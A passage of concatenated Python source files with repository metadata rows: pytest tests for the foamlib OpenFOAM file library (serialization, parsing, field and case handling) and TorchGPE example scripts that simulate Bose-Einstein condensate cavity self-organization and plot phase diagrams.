assert not (clone.path / "Allrun").exists()
run.write_text(
"#!/usr/bin/env python3\nfrom pathlib import Path\nfrom foamlib import FoamCase\nFoamCase(Path(__file__).parent).run(parallel=False)"
)
run.chmod(run.stat().st_mode | stat.S_IEXEC)
clean = clone.path / "clean"
assert not clean.exists()
assert not (clone.path / "Allclean").exists()
clean.write_text(
"#!/usr/bin/env python3\nfrom pathlib import Path\nfrom foamlib import FoamCase\nFoamCase(Path(__file__).parent).clean()"
)
clean.chmod(clean.stat().st_mode | stat.S_IEXEC)
yield clone
def test_run(cavity: FoamCase) -> None:
cavity.run(parallel=False)
cavity.clean()
cavity.run(parallel=False)
assert len(cavity) > 0
internal = cavity[-1]["U"].internal_field
assert isinstance(internal, Sequence)
assert len(internal) == 400
def test_double_clean(cavity: FoamCase) -> None:
cavity.clean()
cavity.clean(check=True)
cavity.run(parallel=False)
def test_cell_centers(cavity: FoamCase) -> None:
cavity.block_mesh()
C = cavity[0].cell_centers()
assert isinstance(C.internal_field, list)
assert len(C.internal_field) == 400
| 2,055 | Python | .py | 51 | 33.607843 | 149 | 0.661809 | gerlero/foamlib | 8 | 2 | 0 | GPL-3.0 | 9/5/2024, 10:48:26 PM (Europe/Amsterdam) |
2,288,155 | test_dumpb.py | gerlero_foamlib/tests/test_files/test_dumpb.py | from foamlib import FoamFile
from foamlib._files._serialization import Kind, dumps
def test_serialize_data() -> None:
assert dumps(1) == b"1"
assert dumps(1.0) == b"1.0"
assert dumps(1.0e-3) == b"0.001"
assert dumps(True) == b"yes"
assert dumps(False) == b"no"
assert dumps("word") == b"word"
assert dumps(("word", "word")) == b"word word"
assert dumps('"a string"') == b'"a string"'
assert dumps(1, kind=Kind.FIELD) == b"uniform 1"
assert dumps(1.0, kind=Kind.FIELD) == b"uniform 1.0"
assert dumps(1.0e-3, kind=Kind.FIELD) == b"uniform 0.001"
assert dumps([1.0, 2.0, 3.0]) == b"(1.0 2.0 3.0)"
assert dumps([1, 2, 3], kind=Kind.FIELD) == b"uniform (1 2 3)"
assert (
dumps([1, 2, 3, 4, 5, 6, 7, 8, 9, 10], kind=Kind.FIELD)
== b"nonuniform List<scalar> 10(1 2 3 4 5 6 7 8 9 10)"
)
assert (
dumps([[1, 2, 3], [4, 5, 6]], kind=Kind.FIELD)
== b"nonuniform List<vector> 2((1 2 3) (4 5 6))"
)
assert dumps(1, kind=Kind.BINARY_FIELD) == b"uniform 1"
assert dumps(1.0, kind=Kind.BINARY_FIELD) == b"uniform 1.0"
assert dumps([1, 2, 3], kind=Kind.BINARY_FIELD) == b"uniform (1 2 3)"
assert (
dumps([1, 2, 3, 4, 5, 6, 7, 8, 9, 10], kind=Kind.BINARY_FIELD)
== b'nonuniform List<scalar> 10(\x00\x00\x00\x00\x00\x00\xf0?\x00\x00\x00\x00\x00\x00\x00@\x00\x00\x00\x00\x00\x00\x08@\x00\x00\x00\x00\x00\x00\x10@\x00\x00\x00\x00\x00\x00\x14@\x00\x00\x00\x00\x00\x00\x18@\x00\x00\x00\x00\x00\x00\x1c@\x00\x00\x00\x00\x00\x00 @\x00\x00\x00\x00\x00\x00"@\x00\x00\x00\x00\x00\x00$@)'
)
assert (
dumps([[1, 2, 3], [4, 5, 6]], kind=Kind.BINARY_FIELD)
== b"nonuniform List<vector> 2(\x00\x00\x00\x00\x00\x00\xf0?\x00\x00\x00\x00\x00\x00\x00@\x00\x00\x00\x00\x00\x00\x08@\x00\x00\x00\x00\x00\x00\x10@\x00\x00\x00\x00\x00\x00\x14@\x00\x00\x00\x00\x00\x00\x18@)"
)
assert (
dumps(FoamFile.DimensionSet(mass=1, length=1, time=-2)) == b"[1 1 -2 0 0 0 0]"
)
assert (
dumps(
FoamFile.Dimensioned(
name="g",
dimensions=FoamFile.DimensionSet(mass=1, length=1, time=-2),
value=9.81,
)
)
== b"g [1 1 -2 0 0 0 0] 9.81"
)
assert (
dumps(
FoamFile.Dimensioned(
dimensions=FoamFile.DimensionSet(mass=1, length=1, time=-2), value=9.81
)
)
== b"[1 1 -2 0 0 0 0] 9.81"
)
assert (
dumps(("hex", [0, 1, 2, 3, 4, 5, 6, 7], [1, 1, 1], "simpleGrading", [1, 1, 1]))
== b"hex (0 1 2 3 4 5 6 7) (1 1 1) simpleGrading (1 1 1)"
)
assert dumps([{"a": "b"}, {"c": "d"}]) == b"(a b; c d;)"
assert dumps([{"a": {"b": "c"}}, {"d": {"e": "g"}}]) == b"(a {b c;} d {e g;})"
assert dumps([{"a": [0, 1, 2]}, {"b": {}}]) == b"(a (0 1 2); b {})"
assert dumps(["water", "oil", "mercury", "air"]) == b"(water oil mercury air)"
assert dumps("div(phi,U)") == b"div(phi,U)"
| 3,000 | Python | .py | 65 | 39.030769 | 323 | 0.543812 | gerlero/foamlib | 8 | 2 | 0 | GPL-3.0 | 9/5/2024, 10:48:26 PM (Europe/Amsterdam) |
2,288,156 | test_files.py | gerlero_foamlib/tests/test_files/test_files.py | import os
import sys
from pathlib import Path
if sys.version_info >= (3, 9):
from collections.abc import Generator, Sequence
else:
from typing import Generator, Sequence
import numpy as np
import pytest
from foamlib import FoamCase, FoamFieldFile, FoamFile
def test_write_read(tmp_path: Path) -> None:
path = tmp_path / "testDict"
d = FoamFile(path)
assert d.path == path
with pytest.raises(FileNotFoundError):
d["key"]
with d, pytest.raises(FileNotFoundError):
d["key"]
d[None] = "touch"
assert len(d) == 1
assert d[None] == "touch"
assert list(d) == [None]
del d[None]
assert not d
assert len(d) == 0
assert list(d) == []
with pytest.raises(KeyError):
d["key"]
d["key"] = "value"
assert d["key"] == "value"
assert len(d) == 1
assert "key" in d
assert list(d) == ["key"]
assert "FoamFile" in d
del d["key"]
assert not d
assert "key" not in d
with pytest.raises(KeyError):
del d["key"]
assert d.version == 2.0
assert d.format == "ascii"
assert d.class_ == "dictionary"
assert d.location == f'"{d.path.parent.name}"'
assert d.object_ == d.path.name
d["subdict"] = {"key": "value"}
sd = d["subdict"]
assert isinstance(sd, FoamFile.SubDict)
assert sd["key"] == "value"
assert len(sd) == 1
assert list(sd) == ["key"]
d["subdict2"] = d["subdict"]
sd2 = d["subdict2"]
assert isinstance(sd2, FoamFile.SubDict)
assert sd2["key"] == "value"
assert len(sd) == 1
assert list(sd) == ["key"]
sd["subsubdict"] = d["subdict"]
ssd = sd["subsubdict"]
assert isinstance(ssd, FoamFile.SubDict)
assert ssd["key"] == "value"
sd["list"] = [1, 2, 3]
assert sd["list"] == [1, 2, 3]
sd["nestedList"] = [[1, 2, 3], [4, 5, 6], [7, 8, 9]]
assert sd["nestedList"] == [[1, 2, 3], [4, 5, 6], [7, 8, 9]]
sd["g"] = FoamFile.Dimensioned(
name="g", dimensions=[1, 1, -2, 0, 0, 0, 0], value=[0, 0, -9.81]
)
assert sd["g"] == FoamFile.Dimensioned(
name="g",
dimensions=FoamFile.DimensionSet(mass=1, length=1, time=-2),
value=[0, 0, -9.81],
)
with d:
lst = d["subdict", "list"]
assert isinstance(lst, list)
lst[0] = 0
assert lst == [0, 2, 3]
assert d["subdict", "list"] == [1, 2, 3]
def test_new_field(tmp_path: Path) -> None:
Path(tmp_path / "testField").touch()
f = FoamFieldFile(tmp_path / "testField")
f.internal_field = [1, 2, 3]
assert f.internal_field == [1, 2, 3]
assert f.class_ == "volVectorField"
@pytest.fixture
def cavity() -> Generator[FoamCase, None, None]:
tutorials_path = Path(os.environ["FOAM_TUTORIALS"])
path = tutorials_path / "incompressible" / "icoFoam" / "cavity" / "cavity"
of11_path = tutorials_path / "incompressibleFluid" / "cavity"
case = FoamCase(path if path.exists() else of11_path)
with case.clone() as clone:
yield clone
def test_dimensions(cavity: FoamCase) -> None:
assert cavity[0]["p"].dimensions == FoamFile.DimensionSet(length=2, time=-2)
assert cavity[0]["U"].dimensions == FoamFile.DimensionSet(length=1, time=-1)
cavity[0]["p"].dimensions = FoamFile.DimensionSet(mass=1, length=1, time=-2)
assert cavity[0]["p"].dimensions == FoamFile.DimensionSet(mass=1, length=1, time=-2)
def test_boundary_field(cavity: FoamCase) -> None:
moving_wall = cavity[0]["p"].boundary_field["movingWall"]
assert isinstance(moving_wall, FoamFieldFile.BoundarySubDict)
assert moving_wall.type == "zeroGradient"
assert "value" not in moving_wall
moving_wall.type = "fixedValue"
moving_wall.value = 0
assert moving_wall.type == "fixedValue"
assert moving_wall.value == 0
def test_mesh(cavity: FoamCase) -> None:
cavity.run(parallel=False)
file = cavity.file("constant/polyMesh/points")
assert None in file
assert None in list(file)
points = file[None]
assert isinstance(points, Sequence)
assert isinstance(points[0], Sequence)
assert len(points[0]) == 3
def test_internal_field(cavity: FoamCase) -> None:
blocks = cavity.block_mesh_dict["blocks"]
assert isinstance(blocks, list)
sizes = blocks[2]
assert isinstance(sizes, list)
size = np.prod(sizes)
p_arr = np.zeros(size)
U_arr = np.zeros((size, 3))
cavity[0]["p"].internal_field = p_arr
cavity[0]["U"].internal_field = U_arr
assert cavity[0]["p"].internal_field == pytest.approx(p_arr)
U = cavity[0]["U"].internal_field
assert isinstance(U, Sequence)
for u, u_arr in zip(U, U_arr):
assert u == pytest.approx(u_arr)
p_arr = np.arange(size) * 1e-6
U_arr = np.full((size, 3), [-1e-6, 1e-6, 0]) * np.arange(size)[:, np.newaxis]
cavity[0]["p"].internal_field = p_arr
cavity[0]["U"].internal_field = U_arr
assert cavity[0]["p"].internal_field == pytest.approx(p_arr)
U = cavity[0]["U"].internal_field
assert isinstance(U, Sequence)
for u, u_arr in zip(U, U_arr):
assert u == pytest.approx(u_arr)
cavity.run(parallel=False)
def test_fv_schemes(cavity: FoamCase) -> None:
div_schemes = cavity.fv_schemes["divSchemes"]
assert isinstance(div_schemes, FoamFile.SubDict)
scheme = div_schemes["div(phi,U)"]
assert isinstance(scheme, tuple)
assert len(scheme) >= 2
assert scheme[0] == "Gauss"
def test_binary_field(cavity: FoamCase) -> None:
cavity.control_dict["writeFormat"] = "binary"
cavity.run(parallel=False)
p_bin = cavity[-1]["p"].internal_field
assert isinstance(p_bin, Sequence)
U_bin = cavity[-1]["U"].internal_field
assert isinstance(U_bin, Sequence)
assert isinstance(U_bin[0], Sequence)
assert len(U_bin[0]) == 3
size = len(p_bin)
assert len(U_bin) == size
cavity.clean()
p_arr = np.arange(size) * 1e-6
U_arr = np.full((size, 3), [-1e-6, 1e-6, 0]) * np.arange(size)[:, np.newaxis]
cavity[0]["p"].internal_field = p_arr
cavity[0]["U"].internal_field = U_arr
assert cavity[0]["p"].internal_field == pytest.approx(p_arr)
U = cavity[0]["U"].internal_field
assert isinstance(U, Sequence)
for u, u_arr in zip(U, U_arr):
assert u == pytest.approx(u_arr)
cavity.run(parallel=False)
def test_compressed_field(cavity: FoamCase) -> None:
cavity.control_dict["writeCompression"] = True
cavity.run(parallel=False)
p_bin = cavity[-1]["p"].internal_field
assert isinstance(p_bin, Sequence)
U_bin = cavity[-1]["U"].internal_field
assert isinstance(U_bin, Sequence)
assert isinstance(U_bin[0], Sequence)
assert len(U_bin[0]) == 3
size = len(p_bin)
assert len(U_bin) == size
cavity.clean()
p_arr = np.arange(size) * 1e-6
U_arr = np.full((size, 3), [-1e-6, 1e-6, 0]) * np.arange(size)[:, np.newaxis]
cavity[0]["p"].internal_field = p_arr
cavity[0]["U"].internal_field = U_arr
assert cavity[0]["p"].internal_field == pytest.approx(p_arr)
U = cavity[0]["U"].internal_field
assert isinstance(U, Sequence)
for u, u_arr in zip(U, U_arr):
assert u == pytest.approx(u_arr)
cavity.run(parallel=False)
| 7,232 | Python | .py | 191 | 32.544503 | 88 | 0.631164 | gerlero/foamlib | 8 | 2 | 0 | GPL-3.0 | 9/5/2024, 10:48:26 PM (Europe/Amsterdam) |
2,288,157 | test_parsing.py | gerlero_foamlib/tests/test_files/test_parsing.py | from foamlib import FoamFile
from foamlib._files._parsing import Parsed
def test_parse_value() -> None:
assert Parsed(b"1")[()] == 1
assert Parsed(b"1.0")[()] == 1.0
assert Parsed(b"1.0e-3")[()] == 1.0e-3
assert Parsed(b"yes")[()] is True
assert Parsed(b"no")[()] is False
assert Parsed(b"word")[()] == "word"
assert Parsed(b"word word")[()] == ("word", "word")
assert Parsed(b'"a string"')[()] == '"a string"'
assert Parsed(b"uniform 1")[()] == 1
assert Parsed(b"uniform 1.0")[()] == 1.0
assert Parsed(b"uniform 1.0e-3")[()] == 1.0e-3
assert Parsed(b"(1.0 2.0 3.0)")[()] == [1.0, 2.0, 3.0]
assert Parsed(b"uniform (1 2 3)")[()] == [1, 2, 3]
assert Parsed(b"nonuniform List<scalar> 2(1 2)")[()] == [1, 2]
assert Parsed(b"nonuniform List<scalar> 2{1}")[()] == [1, 1]
assert Parsed(b"3(1 2 3)")[()] == [1, 2, 3]
assert Parsed(b"2((1 2 3) (4 5 6))")[()] == [
[1, 2, 3],
[4, 5, 6],
]
assert Parsed(b"2{(1 2 3)}")[()] == [
[1, 2, 3],
[1, 2, 3],
]
assert Parsed(b"nonuniform List<vector> 2((1 2 3) (4 5 6))")[()] == [
[1, 2, 3],
[4, 5, 6],
]
assert Parsed(b"nonuniform List<vector> 2{(1 2 3)}")[()] == [
[1, 2, 3],
[1, 2, 3],
]
assert Parsed(
b"nonuniform List<scalar> 2(\x00\x00\x00\x00\x00\x00\xf0?\x00\x00\x00\x00\x00\x00\x00@)"
)[()] == [1, 2]
assert Parsed(
b"nonuniform List<vector> 2(\x00\x00\x00\x00\x00\x00\xf0?\x00\x00\x00\x00\x00\x00\x00@\x00\x00\x00\x00\x00\x00\x08@\x00\x00\x00\x00\x00\x00\x10@\x00\x00\x00\x00\x00\x00\x14@\x00\x00\x00\x00\x00\x00\x18@)"
)[()] == [[1, 2, 3], [4, 5, 6]]
assert Parsed(b"[1 1 -2 0 0 0 0]")[()] == FoamFile.DimensionSet(
mass=1, length=1, time=-2
)
assert Parsed(b"g [1 1 -2 0 0 0 0] (0 0 -9.81)")[()] == FoamFile.Dimensioned(
name="g",
dimensions=FoamFile.DimensionSet(mass=1, length=1, time=-2),
value=[0, 0, -9.81],
)
assert Parsed(b"[1 1 -2 0 0 0 0] 9.81")[()] == FoamFile.Dimensioned(
dimensions=FoamFile.DimensionSet(mass=1, length=1, time=-2), value=9.81
)
assert Parsed(b"hex (0 1 2 3 4 5 6 7) (1 1 1) simpleGrading (1 1 1)")[()] == (
"hex",
[0, 1, 2, 3, 4, 5, 6, 7],
[1, 1, 1],
"simpleGrading",
[1, 1, 1],
)
assert Parsed(b"(a b; c d;)")[()] == [{"a": "b"}, {"c": "d"}]
assert Parsed(b"(a {b c;} d {e g;})")[()] == [
{"a": {"b": "c"}},
{"d": {"e": "g"}},
]
assert Parsed(b"(a (0 1 2); b {})")[()] == [{"a": [0, 1, 2]}, {"b": {}}]
assert Parsed(b"(water oil mercury air)")[()] == ["water", "oil", "mercury", "air"]
assert Parsed(b"div(phi,U)")[()] == "div(phi,U)"
assert Parsed(b"((air and water) { type constant; sigma 0.07; })")[()] == [
{"(air and water)": {"type": "constant", "sigma": 0.07}}
]
assert Parsed(b"[]")[()] == FoamFile.DimensionSet()
assert Parsed(b"object f.1;")["object"] == "f.1"
| 3,016 | Python | .py | 72 | 35.75 | 212 | 0.50068 | gerlero/foamlib | 8 | 2 | 0 | GPL-3.0 | 9/5/2024, 10:48:26 PM (Europe/Amsterdam) |
2,288,158 | blue_self_organization_imaginary_time.py | qo-eth_TorchGPE/examples/blue_self_organization/imaginary_time/blue_self_organization_imaginary_time.py | from datetime import datetime
from torchgpe.bec2D import Gas
from torchgpe.bec2D.callbacks import CavityMonitor
from torchgpe.bec2D.potentials import Contact, DispersiveCavity, Trap
from torchgpe.utils.potentials import linear_ramp
from torchgpe.utils import parse_config
import numpy as np
import torch
import matplotlib.pyplot as plt
from matplotlib import ticker
from scipy.constants import hbar
from tqdm.auto import tqdm
config = parse_config("configuration.yaml")
np.random.seed(config["random_seed"])
torch.manual_seed(config["random_seed"])
contact = Contact()
trap = Trap(**config["potentials"]["trap"])
bec = Gas(**config["gas"], float_dtype=torch.float32, complex_dtype=torch.complex64)
detunings = torch.linspace(*config["boundaries"]["cavity_detuning"])
depths = torch.linspace(*config["boundaries"]["lattice_depth"])
alphas = torch.tensor(np.empty((detunings.shape[0], depths.shape[0]), dtype=complex))
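# Scan the (cavity detuning, pump lattice depth) plane: for each pair, relax the gas
# to its ground state in imaginary time and record the resulting intracavity field
# alpha, whose magnitude signals self-organization.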
for d_idx, detuning in enumerate(tqdm(detunings, smoothing=0, desc = "Phase diagram", bar_format='{l_bar}{bar}| {n_fmt}/{total_fmt} [{elapsed}<{remaining}]')):
for p_idx, pump in enumerate(tqdm(depths, smoothing=0, desc = "Row", bar_format='{l_bar}{bar}| {n_fmt}/{total_fmt} [{elapsed}<{remaining}]', leave=False)):
cavity = DispersiveCavity(lattice_depth=pump, cavity_detuning=detuning, **config["potentials"]["cavity"])
bec.psi = torch.exp(-(bec.X**2 + bec.Y**2)/(2*(config["initial_wavefunction"]["gaussian_sigma"] / bec.adim_length)**2))
bec.ground_state([trap, contact, cavity], callbacks=[], **config["propagation"]["imaginary_time"])
alphas[d_idx, p_idx] = cavity.get_alpha(bec.psi)
def pi_tick_formatter(val, pos):
if val == 0: return 0
if (val/np.pi*4) % 4 == 0:
return f"${('+' if np.sign(val)==1 else '-') if abs(val/np.pi)==1 else int(val/np.pi)}\\pi$"
return f"${('+' if np.sign(val)==1 else '-') if abs(val/np.pi*4)==1 else int(val/np.pi*4)}\\pi / 4$"
def plot_pd(x,y,z):
fig, ax = plt.subplots(1, 2, figsize=(8, 3))
ax = ax.flatten()
im0 = ax[0].pcolormesh(x, y/1e6, np.log10(np.abs(z)), shading='auto', cmap="viridis")
ax[0].set_xlabel(r"$V_i$ [$E_r$]")
ax[0].set_ylabel(r"$\Delta_c$ [$MHz$]")
plt.colorbar(im0, ax = ax[0], orientation='vertical', label="$\\log|\\alpha|$")
x_left, x_right = ax[0].get_xlim()
y_low, y_high = ax[0].get_ylim()
ax[0].set_aspect(abs((x_right-x_left)/(y_low-y_high)) * 1)
im0 = ax[1].pcolormesh(x, y/1e6, np.angle(z)%np.pi, shading='auto', cmap="twilight", vmin=0, vmax=np.pi)
ax[1].set_xlabel(r"$V_i$ [$E_r$]")
ax[1].set_ylabel(r"$\Delta_c$ [$MHz$]")
cbar = plt.colorbar(im0, ax = ax[1], orientation='vertical', label="$Arg(\\alpha)$", format=ticker.FuncFormatter(pi_tick_formatter), ticks=ticker.MultipleLocator(base=np.pi))
x_left, x_right = ax[1].get_xlim()
y_low, y_high = ax[1].get_ylim()
ax[1].set_aspect(abs((x_right-x_left)/(y_low-y_high)) * 1)
plt.suptitle(datetime.now().strftime("%d %b %Y %H:%M:%S"))
plt.tight_layout()
plt.savefig("blue_self_organization_imaginary_time.png")
plot_pd(depths, detunings, alphas)
| 3,150 | Python | .py | 53 | 55.339623 | 178 | 0.672318 | qo-eth/TorchGPE | 8 | 1 | 1 | GPL-3.0 | 9/5/2024, 10:48:26 PM (Europe/Amsterdam) |
2,288,159 | blue_self_organization_real_time.py | qo-eth_TorchGPE/examples/blue_self_organization/real_time/blue_self_organization_real_time.py | from datetime import datetime
from torchgpe.bec2D import Gas
from torchgpe.bec2D.callbacks import CavityMonitor
from torchgpe.bec2D.potentials import Contact, DispersiveCavity, Trap
from torchgpe.utils.potentials import linear_ramp
from torchgpe.utils import parse_config
import numpy as np
import torch
import matplotlib.pyplot as plt
from matplotlib import ticker
from scipy.constants import hbar
from tqdm.auto import tqdm
config = parse_config("configuration.yaml")
np.random.seed(config["random_seed"])
torch.manual_seed(config["random_seed"])
contact = Contact()
trap = Trap(**config["potentials"]["trap"])
bec = Gas(**config["gas"], float_dtype=torch.float32, complex_dtype=torch.complex64)
ramp = config["boundaries"]["lattice_ramp"]
detunings = torch.linspace(*config["boundaries"]["cavity_detuning"])
depths = torch.tensor([ramp(t) for t in torch.arange(0, config["propagation"]["real_time"]["final_time"], config["propagation"]["real_time"]["time_step"])])
alphas = torch.tensor(np.empty((detunings.shape[0], depths.shape[0]), dtype=complex))
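# For each cavity detuning: prepare the trapped ground state without the cavity, then
# ramp the pump lattice in real time while the CavityMonitor callback records the
# intracavity field alpha(t) along the ramp.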
for d_idx, detuning in enumerate(tqdm(detunings, smoothing=0, desc = "Phase diagram", bar_format='{l_bar}{bar}| {n_fmt}/{total_fmt} [{elapsed}<{remaining}]')):
cavity = DispersiveCavity(lattice_depth=ramp, cavity_detuning=detuning, **config["potentials"]["cavity"])
cavityMonitor = CavityMonitor(cavity)
bec.psi = torch.exp(-(bec.X**2 + bec.Y**2)/(2*(config["initial_wavefunction"]["gaussian_sigma"] / bec.adim_length)**2))
bec.ground_state([trap, contact], callbacks=[], **config["propagation"]["imaginary_time"])
bec.propagate(potentials = [trap, contact, cavity], callbacks=[cavityMonitor], **config["propagation"]["real_time"])
alphas[d_idx] = cavityMonitor.alpha[0]
def pi_tick_formatter(val, pos):
if val == 0: return 0
if (val/np.pi*4) % 4 == 0:
return f"${('+' if np.sign(val)==1 else '-') if abs(val/np.pi)==1 else int(val/np.pi)}\\pi$"
return f"${('+' if np.sign(val)==1 else '-') if abs(val/np.pi*4)==1 else int(val/np.pi*4)}\\pi / 4$"
def plot_pd(x,y,z):
fig, ax = plt.subplots(1, 2, figsize=(8, 3))
ax = ax.flatten()
im0 = ax[0].pcolormesh(x, y/1e6, np.log10(np.abs(z)), shading='auto', cmap="viridis")
ax[0].set_xlabel(r"$V_i$ [$E_r$]")
ax[0].set_ylabel(r"$\Delta_c$ [$MHz$]")
plt.colorbar(im0, ax = ax[0], orientation='vertical', label="$\\log|\\alpha|$")
x_left, x_right = ax[0].get_xlim()
y_low, y_high = ax[0].get_ylim()
ax[0].set_aspect(abs((x_right-x_left)/(y_low-y_high)) * 1)
im0 = ax[1].pcolormesh(x, y/1e6, np.angle(z), shading='auto', cmap="twilight", vmin=-np.pi, vmax=np.pi)
ax[1].set_xlabel(r"$V_i$ [$E_r$]")
ax[1].set_ylabel(r"$\Delta_c$ [$MHz$]")
cbar = plt.colorbar(im0, ax = ax[1], orientation='vertical', label="$Arg(\\alpha)$", format=ticker.FuncFormatter(pi_tick_formatter), ticks=ticker.MultipleLocator(base=np.pi))
x_left, x_right = ax[1].get_xlim()
y_low, y_high = ax[1].get_ylim()
ax[1].set_aspect(abs((x_right-x_left)/(y_low-y_high)) * 1)
plt.suptitle(datetime.now().strftime("%d %b %Y %H:%M:%S"))
plt.tight_layout()
plt.savefig("blue_self_organization_real_time.png")
plot_pd(depths, detunings, alphas)
| 3,253 | Python | .py | 55 | 55.327273 | 178 | 0.679621 | qo-eth/TorchGPE | 8 | 1 | 1 | GPL-3.0 | 9/5/2024, 10:48:26 PM (Europe/Amsterdam) |
2,288,160 | cavity_self_organization_imaginary_time.py | qo-eth_TorchGPE/examples/cavity_self_organization/imaginary_time/cavity_self_organization_imaginary_time.py | from torchgpe.bec2D import Gas
from torchgpe.bec2D.callbacks import CavityMonitor
from torchgpe.bec2D.potentials import Contact, DispersiveCavity, Trap
from torchgpe.utils.potentials import linear_ramp
from torchgpe.utils import parse_config
import numpy as np
import torch
import matplotlib.pyplot as plt
from matplotlib import ticker
from scipy.constants import hbar
from tqdm.auto import tqdm
from datetime import datetime
config = parse_config("configuration.yaml")
np.random.seed(config["random_seed"])
torch.manual_seed(config["random_seed"])
contact = Contact()
trap = Trap(**config["potentials"]["trap"])
bec = Gas(**config["gas"], float_dtype=torch.float32,
complex_dtype=torch.complex64)
detunings = torch.linspace(*config["boundaries"]["cavity_detuning"])
depths = torch.linspace(*config["boundaries"]["lattice_depth"])
alphas = torch.tensor(
np.empty((detunings.shape[0], depths.shape[0]), dtype=complex))
for d_idx, detuning in enumerate(tqdm(detunings, smoothing=0, desc="Phase diagram", bar_format='{l_bar}{bar}| {n_fmt}/{total_fmt} [{elapsed}<{remaining}]')):
for p_idx, pump in enumerate(tqdm(depths, smoothing=0, desc="Row", bar_format='{l_bar}{bar}| {n_fmt}/{total_fmt} [{elapsed}<{remaining}]', leave=False)):
cavity = DispersiveCavity(
lattice_depth=pump, cavity_detuning=detuning, **config["potentials"]["cavity"])
bec.psi = torch.exp(-(bec.X**2 + bec.Y**2)/(
2*(config["initial_wavefunction"]["gaussian_sigma"] / bec.adim_length)**2))
bec.ground_state([trap, contact, cavity], callbacks=[],
**config["propagation"]["imaginary_time"])
alphas[d_idx, p_idx] = cavity.get_alpha(bec.psi)
def pi_tick_formatter(val, pos):
if val == 0:
return 0
if (val/np.pi*4) % 4 == 0:
return f"${('+' if np.sign(val)==1 else '-') if abs(val/np.pi)==1 else int(val/np.pi)}\\pi$"
return f"${('+' if np.sign(val)==1 else '-') if abs(val/np.pi*4)==1 else int(val/np.pi*4)}\\pi / 4$"
def plot_pd(x, y, z):
fig, ax = plt.subplots(1, 2, figsize=(8, 3))
ax = ax.flatten()
im0 = ax[0].pcolormesh(x, y/1e6, np.log10(np.abs(z)),
shading='auto', cmap="viridis")
ax[0].set_xlabel(r"$V_i$ [$E_r$]")
ax[0].set_ylabel(r"$\Delta_c$ [$MHz$]")
plt.colorbar(im0, ax=ax[0], orientation='vertical',
label="$\\log|\\alpha|$")
x_left, x_right = ax[0].get_xlim()
y_low, y_high = ax[0].get_ylim()
ax[0].set_aspect(abs((x_right-x_left)/(y_low-y_high)) * 1)
ax[0].axhline(y=config["gas"]["N_particles"]*config["potentials"]["cavity"]["cavity_coupling"]
** 2/(2*config["potentials"]["cavity"]["atomic_detuning"])/1e6, color="red", ls="dashed")
im0 = ax[1].pcolormesh(x, y/1e6, np.angle(z), shading='auto',
cmap="twilight", vmin=-np.pi, vmax=np.pi)
ax[1].set_xlabel(r"$V_i$ [$E_r$]")
ax[1].set_ylabel(r"$\Delta_c$ [$MHz$]")
plt.colorbar(im0, ax=ax[1], orientation='vertical', label="$Arg(\\alpha)$", format=ticker.FuncFormatter(
pi_tick_formatter), ticks=ticker.MultipleLocator(base=np.pi))
x_left, x_right = ax[1].get_xlim()
y_low, y_high = ax[1].get_ylim()
ax[1].set_aspect(abs((x_right-x_left)/(y_low-y_high)) * 1)
plt.suptitle(datetime.now().strftime("%d %b %Y %H:%M:%S"))
plt.tight_layout()
plt.savefig("cavity_self_organization_imaginary_time.png")
plot_pd(depths, detunings, alphas)
# ! check meshgrid indexing and plotting | 3,533 | Python | .py | 66 | 47.560606 | 157 | 0.643148 | qo-eth/TorchGPE | 8 | 1 | 1 | GPL-3.0 | 9/5/2024, 10:48:26 PM (Europe/Amsterdam) |
2,288,161 | cavity_self_organization_real_time.py | qo-eth_TorchGPE/examples/cavity_self_organization/real_time/cavity_self_organization_real_time.py | from torchgpe.bec2D import Gas
from torchgpe.bec2D.callbacks import CavityMonitor
from torchgpe.bec2D.potentials import Contact, DispersiveCavity, Trap
from torchgpe.utils.potentials import linear_ramp
from torchgpe.utils import parse_config
from datetime import datetime
import numpy as np
import torch
import matplotlib.pyplot as plt
from matplotlib import ticker
from scipy.constants import hbar
from tqdm.auto import tqdm
config = parse_config("configuration.yaml")
np.random.seed(config["random_seed"])
torch.manual_seed(config["random_seed"])
contact = Contact()
trap = Trap(**config["potentials"]["trap"])
bec = Gas(**config["gas"], float_dtype=torch.float32, complex_dtype=torch.complex64)
ramp = config["boundaries"]["lattice_ramp"]
detunings = torch.linspace(*config["boundaries"]["cavity_detuning"])
depths = torch.tensor([ramp(t) for t in torch.arange(0, config["propagation"]["real_time"]["final_time"], config["propagation"]["real_time"]["time_step"])])
alphas = torch.tensor(np.empty((detunings.shape[0], depths.shape[0]), dtype=complex))
for d_idx, detuning in enumerate(tqdm(detunings, smoothing=0, desc = "Phase diagram", bar_format='{l_bar}{bar}| {n_fmt}/{total_fmt} [{elapsed}<{remaining}]')):
cavity = DispersiveCavity(lattice_depth=ramp, cavity_detuning=detuning, **config["potentials"]["cavity"])
cavityMonitor = CavityMonitor(cavity)
bec.psi = torch.exp(-(bec.X**2 + bec.Y**2)/(2*(config["initial_wavefunction"]["gaussian_sigma"] / bec.adim_length)**2))
bec.ground_state([trap, contact], callbacks=[], **config["propagation"]["imaginary_time"])
bec.propagate(potentials = [trap, contact, cavity], callbacks=[cavityMonitor], **config["propagation"]["real_time"])
alphas[d_idx] = cavityMonitor.alpha[0]
def pi_tick_formatter(val, pos):
if val == 0: return 0
if (val/np.pi*4) % 4 == 0:
return f"${('+' if np.sign(val)==1 else '-') if abs(val/np.pi)==1 else int(val/np.pi)}\\pi$"
return f"${('+' if np.sign(val)==1 else '-') if abs(val/np.pi*4)==1 else int(val/np.pi*4)}\\pi / 4$"
def plot_pd(x, y, z):
fig, ax = plt.subplots(1, 2, figsize=(8, 3))
ax = ax.flatten()
im0 = ax[0].pcolormesh(x, y/1e6, np.log10(np.abs(z)), shading='auto', cmap="viridis")
ax[0].set_xlabel(r"$V_i$ [$E_r$]")
ax[0].set_ylabel(r"$\Delta_c$ [$MHz$]")
plt.colorbar(im0, ax = ax[0], orientation='vertical', label="$\\log|\\alpha|$")
x_left, x_right = ax[0].get_xlim()
y_low, y_high = ax[0].get_ylim()
ax[0].set_aspect(abs((x_right-x_left)/(y_low-y_high)) * 1)
ax[0].axhline(y=config["gas"]["N_particles"]*config["potentials"]["cavity"]["cavity_coupling"]**2/(2*config["potentials"]["cavity"]["atomic_detuning"])/1e6, color="red", ls="dashed")
im0 = ax[1].pcolormesh(x, y/1e6, np.angle(z), shading='auto', cmap="twilight", vmin=-np.pi, vmax=np.pi)
ax[1].set_xlabel(r"$V_i$ [$E_r$]")
ax[1].set_ylabel(r"$\Delta_c$ [$MHz$]")
